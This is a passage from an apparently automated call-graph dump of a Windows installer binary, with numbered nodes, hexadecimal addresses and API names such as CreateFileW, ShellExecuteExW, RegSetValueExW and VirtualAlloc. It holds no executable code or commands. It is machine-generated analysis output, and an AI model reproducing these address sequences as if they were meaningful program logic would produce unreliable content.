4229->4218 4229->4219 4231 401617 GetFileAttributesW 4229->4231 4233 4059bf 4229->4233 4236 405925 CreateDirectoryW 4229->4236 4245 4059a2 CreateDirectoryW 4229->4245 4231->4229 4248 4067e3 GetModuleHandleA 4233->4248 4237 405972 4236->4237 4238 405976 GetLastError 4236->4238 4237->4229 4238->4237 4239 405985 SetFileSecurityW 4238->4239 4239->4237 4240 40599b GetLastError 4239->4240 4240->4237 4242 405456 24 API calls 4241->4242 4243 401431 4242->4243 4244 4063ee lstrcpynW 4243->4244 4244->4228 4246 4059b2 4245->4246 4247 4059b6 GetLastError 4245->4247 4246->4229 4247->4246 4249 406809 GetProcAddress 4248->4249 4250 4067ff 4248->4250 4252 4059c6 4249->4252 4254 406773 GetSystemDirectoryW 4250->4254 4252->4229 4253 406805 4253->4249 4253->4252 4255 406795 wsprintfW LoadLibraryExW 4254->4255 4255->4253 5025 402a42 5026 402d1c 17 API calls 5025->5026 5027 402a48 5026->5027 5028 402a88 5027->5028 5029 402a6f 5027->5029 5036 402925 5027->5036 5030 402aa2 5028->5030 5031 402a92 5028->5031 5034 402a74 5029->5034 5035 402a85 5029->5035 5033 40642b 17 API calls 5030->5033 5032 402d1c 17 API calls 5031->5032 5032->5036 5033->5036 5039 4063ee lstrcpynW 5034->5039 5040 406335 wsprintfW 5035->5040 5039->5036 5040->5036 5041 401c43 5042 402d1c 17 API calls 5041->5042 5043 401c4a 5042->5043 5044 402d1c 17 API calls 5043->5044 5045 401c57 5044->5045 5046 401c6c 5045->5046 5047 402d3e 17 API calls 5045->5047 5048 402d3e 17 API calls 5046->5048 5052 401c7c 5046->5052 5047->5046 5048->5052 5049 401cd3 5051 402d3e 17 API calls 5049->5051 5050 401c87 5053 402d1c 17 API calls 5050->5053 5055 401cd8 5051->5055 5052->5049 5052->5050 5054 401c8c 5053->5054 5056 402d1c 17 API calls 5054->5056 5057 402d3e 17 API calls 5055->5057 5058 401c98 5056->5058 5059 401ce1 FindWindowExW 5057->5059 5060 401cc3 SendMessageW 5058->5060 5061 401ca5 SendMessageTimeoutW 5058->5061 5062 401d03 5059->5062 5060->5062 5061->5062 5063 402b43 5064 4067e3 5 API calls 5063->5064 5065 402b4a 5064->5065 5066 402d3e 17 API calls 5065->5066 5067 402b53 5066->5067 5068 402b57 IIDFromString 5067->5068 5070 402b8e 5067->5070 5069 402b66 5068->5069 5068->5070 5069->5070 5073 4063ee lstrcpynW 5069->5073 5072 402b83 CoTaskMemFree 5072->5070 5073->5072 5074 402947 5075 402d3e 17 API calls 5074->5075 5076 402955 5075->5076 5077 40296b 5076->5077 5078 402d3e 17 API calls 5076->5078 5079 405ebf 2 API calls 5077->5079 5078->5077 5080 402971 5079->5080 5102 405ee4 GetFileAttributesW CreateFileW 5080->5102 5082 40297e 5083 402a21 5082->5083 5084 40298a GlobalAlloc 5082->5084 5087 402a29 DeleteFileW 5083->5087 5088 402a3c 5083->5088 5085 4029a3 5084->5085 5086 402a18 CloseHandle 5084->5086 5103 40345a SetFilePointer 5085->5103 5086->5083 5087->5088 5090 4029a9 5091 403444 ReadFile 5090->5091 5092 4029b2 GlobalAlloc 5091->5092 5093 4029c2 5092->5093 5094 4029f6 5092->5094 5095 40324c 31 API calls 5093->5095 5096 405f96 WriteFile 5094->5096 5101 4029cf 5095->5101 5097 402a02 GlobalFree 5096->5097 5098 40324c 31 API calls 5097->5098 5099 402a15 5098->5099 5099->5086 5100 4029ed GlobalFree 5100->5094 5101->5100 5102->5082 5103->5090 5104 7435103d 5107 7435101b 5104->5107 5114 74351516 5107->5114 5109 74351020 5110 74351027 GlobalAlloc 5109->5110 5111 74351024 5109->5111 5110->5111 5112 7435153d 3 API calls 5111->5112 5113 7435103b 5112->5113 5116 7435151c 5114->5116 5115 74351522 5115->5109 5116->5115 5117 7435152e GlobalFree 5116->5117 5117->5109 5118 4053ca 5119 4053da 5118->5119 5120 4053ee 5118->5120 5121 4053e0 5119->5121 5130 405437 5119->5130 5122 4053f6 IsWindowVisible 5120->5122 5128 40540d 5120->5128 5124 404390 SendMessageW 5121->5124 5125 405403 5122->5125 5122->5130 5123 40543c CallWindowProcW 5126 4053ea 5123->5126 5124->5126 5131 404cff SendMessageW 5125->5131 5128->5123 5136 404d7f 5128->5136 5130->5123 5132 404d22 GetMessagePos ScreenToClient SendMessageW 5131->5132 5133 404d5e SendMessageW 5131->5133 5134 404d56 5132->5134 5135 404d5b 5132->5135 5133->5134 5134->5128 5135->5133 5145 4063ee lstrcpynW 5136->5145 5138 404d92 5146 406335 wsprintfW 5138->5146 5140 404d9c 5141 40140b 2 API calls 5140->5141 5142 404da5 5141->5142 5147 4063ee lstrcpynW 5142->5147 5144 404dac 5144->5130 5145->5138 5146->5140 5147->5144 5151 4016cc 5152 402d3e 17 API calls 5151->5152 5153 4016d2 GetFullPathNameW 5152->5153 5154 40170e 5153->5154 5155 4016ec 5153->5155 5156 402bc2 5154->5156 5157 401723 GetShortPathNameW 5154->5157 5155->5154 5158 40674c 2 API calls 5155->5158 5157->5156 5159 4016fe 5158->5159 5159->5154 5161 4063ee lstrcpynW 5159->5161 5161->5154 5162 401e4e GetDC 5163 402d1c 17 API calls 5162->5163 5164 401e60 GetDeviceCaps MulDiv ReleaseDC 5163->5164 5165 402d1c 17 API calls 5164->5165 5166 401e91 5165->5166 5167 40642b 17 API calls 5166->5167 5168 401ece CreateFontIndirectW 5167->5168 5169 402630 5168->5169 5170 402acf 5171 402d1c 17 API calls 5170->5171 5172 402ad5 5171->5172 5173 402b12 5172->5173 5174 402ae7 5172->5174 5175 402925 5172->5175 5173->5175 5176 40642b 17 API calls 5173->5176 5174->5175 5178 406335 wsprintfW 5174->5178 5176->5175 5178->5175 4731 4020d0 4732 4020e2 4731->4732 4733 402194 4731->4733 4734 402d3e 17 API calls 4732->4734 4735 401423 24 API calls 4733->4735 4736 4020e9 4734->4736 4741 4022ee 4735->4741 4737 402d3e 17 API calls 4736->4737 4738 4020f2 4737->4738 4739 402108 LoadLibraryExW 4738->4739 4740 4020fa GetModuleHandleW 4738->4740 4739->4733 4742 402119 4739->4742 4740->4739 4740->4742 4754 406852 4742->4754 4745 402163 4747 405456 24 API calls 4745->4747 4746 40212a 4748 402132 4746->4748 4749 402149 4746->4749 4750 40213a 4747->4750 4751 401423 24 API calls 4748->4751 4759 74351777 4749->4759 4750->4741 4752 402186 FreeLibrary 4750->4752 4751->4750 4752->4741 4801 406410 WideCharToMultiByte 4754->4801 4756 40686f 4757 406876 GetProcAddress 4756->4757 4758 402124 4756->4758 4757->4758 4758->4745 4758->4746 4760 743517aa 4759->4760 4802 74351b5f 4760->4802 4762 743517b1 4763 743518d6 4762->4763 4764 743517c2 4762->4764 4765 743517c9 4762->4765 4763->4750 4852 7435239e 4764->4852 4836 743523e0 4765->4836 4770 743517ee 4771 7435182d 4770->4771 4772 7435180f 4770->4772 4776 74351833 4771->4776 4777 7435187e 4771->4777 4865 743525b5 4772->4865 4773 743517df 4780 743517e5 4773->4780 4781 743517f0 4773->4781 4774 743517f8 4774->4770 4862 74352d83 4774->4862 4884 743515c6 4776->4884 4778 743525b5 10 API calls 4777->4778 4785 7435186f 4778->4785 4779 74351815 4876 743515b4 4779->4876 4780->4770 4846 74352af8 4780->4846 4856 74352770 4781->4856 4792 743518c5 4785->4792 4890 74352578 4785->4890 4790 743517f6 4790->4770 4791 743525b5 10 API calls 4791->4785 4792->4763 4796 743518cf GlobalFree 4792->4796 4796->4763 4798 743518b1 4798->4792 4894 7435153d wsprintfW 4798->4894 4799 743518aa FreeLibrary 4799->4798 4801->4756 4897 7435121b GlobalAlloc 4802->4897 4804 74351b86 4898 7435121b GlobalAlloc 4804->4898 4806 74351dcb GlobalFree GlobalFree GlobalFree 4807 74351de8 4806->4807 4825 74351e32 4806->4825 4809 743521de 4807->4809 4815 74351dfd 4807->4815 4807->4825 4808 74351c86 GlobalAlloc 4821 74351b91 4808->4821 4810 74352200 GetModuleHandleW 4809->4810 4809->4825 4813 74352226 4810->4813 4814 74352211 LoadLibraryW 4810->4814 4811 74351cd1 lstrcpyW 4817 74351cdb lstrcpyW 4811->4817 4812 74351cef GlobalFree 4812->4821 4905 7435161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4813->4905 4814->4813 4814->4825 4815->4825 4901 7435122c 4815->4901 4817->4821 4818 74352278 4820 74352285 lstrlenW 4818->4820 4818->4825 4819 74352086 4904 7435121b GlobalAlloc 4819->4904 4906 7435161d WideCharToMultiByte GlobalAlloc WideCharToMultiByte GetProcAddress GlobalFree 4820->4906 4821->4806 4821->4808 4821->4811 4821->4812 4821->4817 4821->4819 4824 7435210e 4821->4824 4821->4825 4828 74351fc7 GlobalFree 4821->4828 4830 7435122c 2 API calls 4821->4830 4831 74351d2d 4821->4831 4824->4825 4832 74352176 lstrcpyW 4824->4832 4825->4762 4826 74352238 4826->4818 4835 74352262 GetProcAddress 4826->4835 4828->4821 4829 7435229f 4829->4825 4830->4821 4831->4821 4899 7435158f GlobalSize GlobalAlloc 4831->4899 4832->4825 4834 7435208f 4834->4762 4835->4818 4838 743523f8 4836->4838 4837 7435122c GlobalAlloc lstrcpynW 4837->4838 4838->4837 4840 74352521 GlobalFree 4838->4840 4842 743524a0 GlobalAlloc WideCharToMultiByte 4838->4842 4843 743524cb GlobalAlloc CLSIDFromString 4838->4843 4845 743524ea 4838->4845 4908 743512ba 4838->4908 4840->4838 4841 743517cf 4840->4841 4841->4770 4841->4773 4841->4774 4842->4840 4843->4840 4845->4840 4912 74352704 4845->4912 4847 74352b0a 4846->4847 4848 74352baf CreateFileA 4847->4848 4851 74352bcd 4848->4851 4850 74352c99 4850->4770 4915 74352aa2 4851->4915 4853 743523b3 4852->4853 4854 743523be GlobalAlloc 4853->4854 4855 743517c8 4853->4855 4854->4853 4855->4765 4860 743527a0 4856->4860 4857 7435284e 4859 74352854 GlobalSize 4857->4859 4861 7435285e 4857->4861 4858 7435283b GlobalAlloc 4858->4861 4859->4861 4860->4857 4860->4858 4861->4790 4863 74352d8e 4862->4863 4864 74352dce GlobalFree 4863->4864 4919 7435121b GlobalAlloc 4865->4919 4867 74352638 MultiByteToWideChar 4873 743525bf 4867->4873 4868 7435266b lstrcpynW 4868->4873 4869 7435265a StringFromGUID2 4869->4873 4870 7435267e wsprintfW 4870->4873 4871 743526a2 GlobalFree 4871->4873 4872 743526d7 GlobalFree 4872->4779 4873->4867 4873->4868 4873->4869 4873->4870 4873->4871 4873->4872 4874 74351272 2 API calls 4873->4874 4920 743512e1 4873->4920 4874->4873 4924 7435121b GlobalAlloc 4876->4924 4878 743515b9 4879 743515c6 2 API calls 4878->4879 4880 743515c3 4879->4880 4881 74351272 4880->4881 4882 743512b5 GlobalFree 4881->4882 4883 7435127b GlobalAlloc lstrcpynW 4881->4883 4882->4785 4883->4882 4885 743515d2 wsprintfW 4884->4885 4886 743515ff lstrcpyW 4884->4886 4889 74351618 4885->4889 4886->4889 4889->4791 4891 74352586 4890->4891 4893 74351891 4890->4893 4892 743525a2 GlobalFree 4891->4892 4891->4893 4892->4891 4893->4798 4893->4799 4895 74351272 2 API calls 4894->4895 4896 7435155e 4895->4896 4896->4792 4897->4804 4898->4821 4900 743515ad 4899->4900 4900->4831 4907 7435121b GlobalAlloc 4901->4907 4903 7435123b lstrcpynW 4903->4825 4904->4834 4905->4826 4906->4829 4907->4903 4909 743512c1 4908->4909 4910 7435122c 2 API calls 4909->4910 4911 743512df 4910->4911 4911->4838 4913 74352712 VirtualAlloc 4912->4913 4914 74352768 4912->4914 4913->4914 4914->4845 4916 74352aad 4915->4916 4917 74352ab2 GetLastError 4916->4917 4918 74352abd 4916->4918 4917->4918 4918->4850 4919->4873 4921 7435130c 4920->4921 4922 743512ea 4920->4922 4921->4873 4922->4921 4923 743512f0 lstrcpyW 4922->4923 4923->4921 4924->4878 5179 4028d5 5180 4028dd 5179->5180 5181 4028e1 FindNextFileW 5180->5181 5183 4028f3 5180->5183 5182 40293a 5181->5182 5181->5183 5185 4063ee lstrcpynW 5182->5185 5185->5183 5186 74352ca3 5187 74352cbb 5186->5187 5188 7435158f 2 API calls 5187->5188 5189 74352cd6 5188->5189 5190 401956 5191 402d3e 17 API calls 5190->5191 5192 40195d lstrlenW 5191->5192 5193 402630 5192->5193 4980 4014d7 4985 402d1c 4980->4985 4982 4014dd Sleep 4984 402bc2 4982->4984 4986 40642b 17 API calls 4985->4986 4987 402d31 4986->4987 4987->4982 5011 40175c 5012 402d3e 17 API calls 5011->5012 5013 401763 5012->5013 5014 405f13 2 API calls 5013->5014 5015 40176a 5014->5015 5016 405f13 2 API calls 5015->5016 5016->5015 5194 401d5d 5195 402d1c 17 API calls 5194->5195 5196 401d6e SetWindowLongW 5195->5196 5197 402bc2 5196->5197 5017 401ede 5018 402d1c 17 API calls 5017->5018 5019 401ee4 5018->5019 5020 402d1c 17 API calls 5019->5020 5021 401ef0 5020->5021 5022 401f07 EnableWindow 5021->5022 5023 401efc ShowWindow 5021->5023 5024 402bc2 5022->5024 5023->5024 5198 401563 5199 402b08 5198->5199 5202 406335 wsprintfW 5199->5202 5201 402b0d 5202->5201 5203 4026e4 5204 402d1c 17 API calls 5203->5204 5211 4026f3 5204->5211 5205 402830 5206 40273d ReadFile 5206->5205 5206->5211 5207 405f67 ReadFile 5207->5211 5209 402832 5225 406335 wsprintfW 5209->5225 5210 40277d MultiByteToWideChar 5210->5211 5211->5205 5211->5206 5211->5207 5211->5209 5211->5210 5213 4027a3 SetFilePointer MultiByteToWideChar 5211->5213 5215 402843 5211->5215 5216 405fc5 SetFilePointer 5211->5216 5213->5211 5214 402864 SetFilePointer 5214->5205 5215->5205 5215->5214 5217 405ff9 5216->5217 5218 405fe1 5216->5218 5217->5211 5219 405f67 ReadFile 5218->5219 5220 405fed 5219->5220 5220->5217 5221 406002 SetFilePointer 5220->5221 5222 40602a SetFilePointer 5220->5222 5221->5222 5223 40600d 5221->5223 5222->5217 5224 405f96 WriteFile 5223->5224 5224->5217 5225->5205 5226 401968 5227 402d1c 17 API calls 5226->5227 5228 40196f 5227->5228 5229 402d1c 17 API calls 5228->5229 5230 40197c 5229->5230 5231 402d3e 17 API calls 5230->5231 5232 401993 lstrlenW 5231->5232 5233 4019a4 5232->5233 5234 4019e5 5233->5234 5238 4063ee lstrcpynW 5233->5238 5236 4019d5 5236->5234 5237 4019da lstrlenW 5236->5237 5237->5234 5238->5236 5239 40166a 5240 402d3e 17 API calls 5239->5240 5241 401670 5240->5241 5242 40674c 2 API calls 5241->5242 5243 401676 5242->5243 4565 403e6b 4566 403e83 4565->4566 4567 403fbe 4565->4567 4566->4567 4570 403e8f 4566->4570 4568 40400f 4567->4568 4569 403fcf GetDlgItem GetDlgItem 4567->4569 4574 404069 4568->4574 4582 401389 2 API calls 4568->4582 4573 404344 18 API calls 4569->4573 4571 403e9a SetWindowPos 4570->4571 4572 403ead 4570->4572 4571->4572 4575 403eb2 ShowWindow 4572->4575 4576 403eca 4572->4576 4577 403ff9 SetClassLongW 4573->4577 4578 404390 SendMessageW 4574->4578 4628 403fb9 4574->4628 4575->4576 4579 403ed2 DestroyWindow 4576->4579 4580 403eec 4576->4580 4581 40140b 2 API calls 4577->4581 4625 40407b 4578->4625 4587 4042cd 4579->4587 4583 403ef1 SetWindowLongW 4580->4583 4584 403f02 4580->4584 4581->4568 4585 404041 4582->4585 4583->4628 4589 403fab 4584->4589 4590 403f0e GetDlgItem 4584->4590 4585->4574 4591 404045 SendMessageW 4585->4591 4586 40140b 2 API calls 4586->4625 4592 4042fe ShowWindow 4587->4592 4587->4628 4588 4042cf DestroyWindow EndDialog 4588->4587 4645 4043ab 4589->4645 4593 403f21 SendMessageW IsWindowEnabled 4590->4593 4594 403f3e 4590->4594 4591->4628 4592->4628 4593->4594 4593->4628 4597 403f4b 4594->4597 4598 403f92 SendMessageW 4594->4598 4599 403f5e 4594->4599 4607 403f43 4594->4607 4596 40642b 17 API calls 4596->4625 4597->4598 4597->4607 4598->4589 4601 403f66 4599->4601 4602 403f7b 4599->4602 4604 40140b 2 API calls 4601->4604 4605 40140b 2 API calls 4602->4605 4603 403f79 4603->4589 4604->4607 4608 403f82 4605->4608 4606 404344 18 API calls 4606->4625 4642 40431d 4607->4642 4608->4589 4608->4607 4610 4040f6 GetDlgItem 4611 404113 ShowWindow KiUserCallbackDispatcher 4610->4611 4612 40410b 4610->4612 4639 404366 KiUserCallbackDispatcher 4611->4639 4612->4611 4614 40413d EnableWindow 4619 404151 4614->4619 4615 404156 GetSystemMenu EnableMenuItem SendMessageW 4616 404186 SendMessageW 4615->4616 4615->4619 4616->4619 4618 403e4c 18 API calls 4618->4619 4619->4615 4619->4618 4640 404379 SendMessageW 4619->4640 4641 4063ee lstrcpynW 4619->4641 4621 4041b5 lstrlenW 4622 40642b 17 API calls 4621->4622 4623 4041cb SetWindowTextW 4622->4623 4624 401389 2 API calls 4623->4624 4624->4625 4625->4586 4625->4588 4625->4596 4625->4606 4626 40420f DestroyWindow 4625->4626 4625->4628 4636 404344 4625->4636 4626->4587 4627 404229 CreateDialogParamW 4626->4627 4627->4587 4629 40425c 4627->4629 4630 404344 18 API calls 4629->4630 4631 404267 GetDlgItem GetWindowRect ScreenToClient SetWindowPos 4630->4631 4632 401389 2 API calls 4631->4632 4633 4042ad 4632->4633 4633->4628 4634 4042b5 ShowWindow 4633->4634 4635 404390 SendMessageW 4634->4635 4635->4587 4637 40642b 17 API calls 4636->4637 4638 40434f SetDlgItemTextW 4637->4638 4638->4610 4639->4614 4640->4619 4641->4621 4643 404324 4642->4643 4644 40432a SendMessageW 4642->4644 4643->4644 4644->4603 4646 4043c3 GetWindowLongW 4645->4646 4647 40446e 4645->4647 4646->4647 4648 4043d8 4646->4648 4647->4628 4648->4647 4649 404405 GetSysColor 4648->4649 4650 404408 4648->4650 4649->4650 4651 404418 SetBkMode 4650->4651 4652 40440e SetTextColor 4650->4652 4653 404430 GetSysColor 4651->4653 4654 404436 4651->4654 4652->4651 4653->4654 4655 404447 4654->4655 4656 40443d SetBkColor 4654->4656 4655->4647 4657 404461 CreateBrushIndirect 4655->4657 4658 40445a DeleteObject 4655->4658 4656->4655 4657->4647 4658->4657 5244 4023ec 5245 402d3e 17 API calls 5244->5245 5246 4023fb 5245->5246 5247 402d3e 17 API calls 5246->5247 5248 402404 5247->5248 5249 402d3e 17 API calls 5248->5249 5250 40240e GetPrivateProfileStringW 5249->5250 5251 4047ee 5252 404824 5251->5252 5253 4047fe 5251->5253 5255 4043ab 8 API calls 5252->5255 5254 404344 18 API calls 5253->5254 5256 40480b SetDlgItemTextW 5254->5256 5257 404830 5255->5257 5256->5252 4690 40176f 4691 402d3e 17 API calls 4690->4691 4692 401776 4691->4692 4693 401796 4692->4693 4694 40179e 4692->4694 4729 4063ee lstrcpynW 4693->4729 4730 4063ee lstrcpynW 4694->4730 4697 40179c 4701 40669d 5 API calls 4697->4701 4698 4017a9 4699 405cc3 3 API calls 4698->4699 4700 4017af lstrcatW 4699->4700 4700->4697 4711 4017bb 4701->4711 4702 40674c 2 API calls 4702->4711 4703 405ebf 2 API calls 4703->4711 4705 4017cd CompareFileTime 4705->4711 4706 40188d 4707 405456 24 API calls 4706->4707 4710 401897 4707->4710 4708 405456 24 API calls 4716 401879 4708->4716 4709 4063ee lstrcpynW 4709->4711 4712 40324c 31 API calls 4710->4712 4711->4702 4711->4703 4711->4705 4711->4706 4711->4709 4717 40642b 17 API calls 4711->4717 4725 405a54 MessageBoxIndirectW 4711->4725 4726 401864 4711->4726 4728 405ee4 GetFileAttributesW CreateFileW 4711->4728 4713 4018aa 4712->4713 4714 4018be SetFileTime 4713->4714 4715 4018d0 CloseHandle 4713->4715 4714->4715 4715->4716 4718 4018e1 4715->4718 4717->4711 4719 4018e6 4718->4719 4720 4018f9 4718->4720 4721 40642b 17 API calls 4719->4721 4722 40642b 17 API calls 4720->4722 4723 4018ee lstrcatW 4721->4723 4724 401901 4722->4724 4723->4724 4724->4716 4727 405a54 MessageBoxIndirectW 4724->4727 4725->4711 4726->4708 4726->4716 4727->4716 4728->4711 4729->4697 4730->4698 5258 401a72 5259 402d1c 17 API calls 5258->5259 5260 401a7b 5259->5260 5261 402d1c 17 API calls 5260->5261 5262 401a20 5261->5262 4925 401573 4926 401583 ShowWindow 4925->4926 4927 40158c 4925->4927 4926->4927 4928 40159a ShowWindow 4927->4928 4929 402bc2 4927->4929 4928->4929 5263 74351000 5264 7435101b 5 API calls 5263->5264 5265 74351019 5264->5265 5266 4014f5 SetForegroundWindow 5267 402bc2 5266->5267 5268 401ff6 5269 402d3e 17 API calls 5268->5269 5270 401ffd 5269->5270 5271 40674c 2 API calls 5270->5271 5272 402003 5271->5272 5274 402014 5272->5274 5275 406335 wsprintfW 5272->5275 5275->5274 5276 4022f7 5277 402d3e 17 API calls 5276->5277 5278 4022fd 5277->5278 5279 402d3e 17 API calls 5278->5279 5280 402306 5279->5280 5281 402d3e 17 API calls 5280->5281 5282 40230f 5281->5282 5283 40674c 2 API calls 5282->5283 5284 402318 5283->5284 5285 402329 lstrlenW lstrlenW 5284->5285 5289 40231c 5284->5289 5287 405456 24 API calls 5285->5287 5286 405456 24 API calls 5290 402324 5286->5290 5288 402367 SHFileOperationW 5287->5288 5288->5289 5288->5290 5289->5286 5289->5290 5291 401b77 5292 402d3e 17 API calls 5291->5292 5293 401b7e 5292->5293 5294 402d1c 17 API calls 5293->5294 5295 401b87 wsprintfW 5294->5295 5296 402bc2 5295->5296 5297 40447a lstrcpynW lstrlenW 5298 40167b 5299 402d3e 17 API calls 5298->5299 5300 401682 5299->5300 5301 402d3e 17 API calls 5300->5301 5302 40168b 5301->5302 5303 402d3e 17 API calls 5302->5303 5304 401694 MoveFileW 5303->5304 5305 4016a0 5304->5305 5306 4016a7 5304->5306 5307 401423 24 API calls 5305->5307 5308 40674c 2 API calls 5306->5308 5310 4022ee 5306->5310 5307->5310 5309 4016b6 5308->5309 5309->5310 5311 4061b4 36 API calls 5309->5311 5311->5305 5312 403a7b 5313 403a86 5312->5313 5314 403a8a 5313->5314 5315 403a8d GlobalAlloc 5313->5315 5315->5314 5316 40237b 5317 402382 5316->5317 5320 402395 5316->5320 5318 40642b 17 API calls 5317->5318 5319 40238f 5318->5319 5319->5320 5321 405a54 MessageBoxIndirectW 5319->5321 5321->5320 5322 4019ff 5323 402d3e 17 API calls 5322->5323 5324 401a06 5323->5324 5325 402d3e 17 API calls 5324->5325 5326 401a0f 5325->5326 5327 401a16 lstrcmpiW 5326->5327 5328 401a28 lstrcmpW 5326->5328 5329 401a1c 5327->5329 5328->5329 5330 401000 5331 401037 BeginPaint GetClientRect 5330->5331 5332 40100c DefWindowProcW 5330->5332 5334 4010f3 5331->5334 5335 401179 5332->5335 5336 401073 CreateBrushIndirect FillRect DeleteObject 5334->5336 5337 4010fc 5334->5337 5336->5334 5338 401102 CreateFontIndirectW 5337->5338 5339 401167 EndPaint 5337->5339 5338->5339 5340 401112 6 API calls 5338->5340 5339->5335 5340->5339 5341 401d81 5342 401d94 GetDlgItem 5341->5342 5343 401d87 5341->5343 5345 401d8e 5342->5345 5344 402d1c 17 API calls 5343->5344 5344->5345 5346 401dd5 GetClientRect LoadImageW SendMessageW 5345->5346 5348 402d3e 17 API calls 5345->5348 5349 401e33 5346->5349 5351 401e3f 5346->5351 5348->5346 5350 401e38 DeleteObject 5349->5350 5349->5351 5350->5351 5352 402482 5353 402d3e 17 API calls 5352->5353 5354 402494 5353->5354 5355 402d3e 17 API calls 5354->5355 5356 40249e 5355->5356 5369 402dce 5356->5369 5359 402bc2 5360 4024d6 5363 402d1c 17 API calls 5360->5363 5365 4024e2 5360->5365 5361 402d3e 17 API calls 5362 4024cc lstrlenW 5361->5362 5362->5360 5363->5365 5364 402501 RegSetValueExW 5367 402517 RegCloseKey 5364->5367 5365->5364 5366 40324c 31 API calls 5365->5366 5366->5364 5367->5359 5370 402de9 5369->5370 5373 406289 5370->5373 5374 406298 5373->5374 5375 4062a3 RegCreateKeyExW 5374->5375 5376 4024ae 5374->5376 5375->5376 5376->5359 5376->5360 5376->5361 5377 402902 5378 402d3e 17 API calls 5377->5378 5379 402909 FindFirstFileW 5378->5379 5380 402931 5379->5380 5384 40291c 5379->5384 5382 40293a 5380->5382 5385 406335 wsprintfW 5380->5385 5386 4063ee lstrcpynW 5382->5386 5385->5382 5386->5384 5387 401503 5388 40150b 5387->5388 5390 40151e 5387->5390 5389 402d1c 17 API calls 5388->5389 5389->5390 5391 404503 5392 40451b 5391->5392 5396 404635 5391->5396 5397 404344 18 API calls 5392->5397 5393 40469f 5394 404769 5393->5394 5395 4046a9 GetDlgItem 5393->5395 5402 4043ab 8 API calls 5394->5402 5398 4046c3 5395->5398 5399 40472a 5395->5399 5396->5393 5396->5394 5400 404670 GetDlgItem SendMessageW 5396->5400 5401 404582 5397->5401 5398->5399 5404 4046e9 SendMessageW LoadCursorW SetCursor 5398->5404 5399->5394 5405 40473c 5399->5405 5424 404366 KiUserCallbackDispatcher 5400->5424 5407 404344 18 API calls 5401->5407 5403 404764 5402->5403 5428 4047b2 5404->5428 5409 404752 5405->5409 5410 404742 SendMessageW 5405->5410 5412 40458f CheckDlgButton 5407->5412 5409->5403 5414 404758 SendMessageW 5409->5414 5410->5409 5411 40469a 5425 40478e 5411->5425 5422 404366 KiUserCallbackDispatcher 5412->5422 5414->5403 5417 4045ad GetDlgItem 5423 404379 SendMessageW 5417->5423 5419 4045c3 SendMessageW 5420 4045e0 GetSysColor 5419->5420 5421 4045e9 SendMessageW SendMessageW lstrlenW SendMessageW SendMessageW 5419->5421 5420->5421 5421->5403 5422->5417 5423->5419 5424->5411 5426 4047a1 SendMessageW 5425->5426 5427 40479c 5425->5427 5426->5393 5427->5426 5431 405a1a ShellExecuteExW 5428->5431 5430 404718 LoadCursorW SetCursor 5430->5399 5431->5430 5432 402889 5433 402890 5432->5433 5435 402b0d 5432->5435 5434 402d1c 17 API calls 5433->5434 5436 402897 5434->5436 5437 4028a6 SetFilePointer 5436->5437 5437->5435 5438 4028b6 5437->5438 5440 406335 wsprintfW 5438->5440 5440->5435 5441 404b8b 5442 404bb7 5441->5442 5443 404b9b 5441->5443 5445 404bea 5442->5445 5446 404bbd SHGetPathFromIDListW 5442->5446 5452 405a38 GetDlgItemTextW 5443->5452 5448 404bd4 SendMessageW 5446->5448 5449 404bcd 5446->5449 5447 404ba8 SendMessageW 5447->5442 5448->5445 5451 40140b 2 API calls 5449->5451 5451->5448 5452->5447 5453 40190c 5454 401943 5453->5454 5455 402d3e 17 API calls 5454->5455 5456 401948 5455->5456 5457 405b00 67 API calls 5456->5457 5458 401951 5457->5458 5459 40190f 5460 402d3e 17 API calls 5459->5460 5461 401916 5460->5461 5462 405a54 MessageBoxIndirectW 5461->5462 5463 40191f 5462->5463 5464 401491 5465 405456 24 API calls 5464->5465 5466 401498 5465->5466 5467 401f12 5468 402d3e 17 API calls 5467->5468 5469 401f18 5468->5469 5470 402d3e 17 API calls 5469->5470 5471 401f21 5470->5471 5472 402d3e 17 API calls 5471->5472 5473 401f2a 5472->5473 5474 402d3e 17 API calls 5473->5474 5475 401f33 5474->5475 5476 401423 24 API calls 5475->5476 5477 401f3a 5476->5477 5484 405a1a ShellExecuteExW 5477->5484 5479 401f82 5481 402925 5479->5481 5485 40688e WaitForSingleObject 5479->5485 5482 401f9f CloseHandle 5482->5481 5484->5479 5486 4068a8 5485->5486 5487 4068ba GetExitCodeProcess 5486->5487 5488 40681f 2 API calls 5486->5488 5487->5482 5489 4068af WaitForSingleObject 5488->5489 5489->5486 5490 402614 5491 402d3e 17 API calls 5490->5491 5492 40261b 5491->5492 5495 405ee4 GetFileAttributesW CreateFileW 5492->5495 5494 402627 5495->5494 5496 743510e1 5505 74351111 5496->5505 5497 743511d8 GlobalFree 5498 743512ba 2 API calls 5498->5505 5499 743511d3 5499->5497 5500 74351272 2 API calls 5503 743511c4 GlobalFree 5500->5503 5501 74351164 GlobalAlloc 5501->5505 5502 743511f8 GlobalFree 5502->5505 5503->5505 5504 743512e1 lstrcpyW 5504->5505 5505->5497 5505->5498 5505->5499 5505->5500 5505->5501 5505->5502 5505->5503 5505->5504 4930 405595 4931 4055b6 GetDlgItem GetDlgItem GetDlgItem 4930->4931 4932 40573f 4930->4932 4976 404379 SendMessageW 4931->4976 4934 405770 4932->4934 4935 405748 GetDlgItem CreateThread CloseHandle 4932->4935 4937 40579b 4934->4937 4938 4057c0 4934->4938 4939 405787 ShowWindow ShowWindow 4934->4939 4935->4934 4979 405529 5 API calls 4935->4979 4936 405626 4943 40562d GetClientRect GetSystemMetrics SendMessageW SendMessageW 4936->4943 4940 4057a7 4937->4940 4941 4057fb 4937->4941 4942 4043ab 8 API calls 4938->4942 4978 404379 SendMessageW 4939->4978 4945 4057d5 ShowWindow 4940->4945 4946 4057af 4940->4946 4941->4938 4953 405809 SendMessageW 4941->4953 4948 4057ce 4942->4948 4951 40569b 4943->4951 4952 40567f SendMessageW SendMessageW 4943->4952 4949 4057f5 4945->4949 4950 4057e7 4945->4950 4947 40431d SendMessageW 4946->4947 4947->4938 4955 40431d SendMessageW 4949->4955 4954 405456 24 API calls 4950->4954 4956 4056a0 SendMessageW 4951->4956 4957 4056ae 4951->4957 4952->4951 4953->4948 4958 405822 CreatePopupMenu 4953->4958 4954->4949 4955->4941 4956->4957 4960 404344 18 API calls 4957->4960 4959 40642b 17 API calls 4958->4959 4961 405832 AppendMenuW 4959->4961 4962 4056be 4960->4962 4965 405862 TrackPopupMenu 4961->4965 4966 40584f GetWindowRect 4961->4966 4963 4056c7 ShowWindow 4962->4963 4964 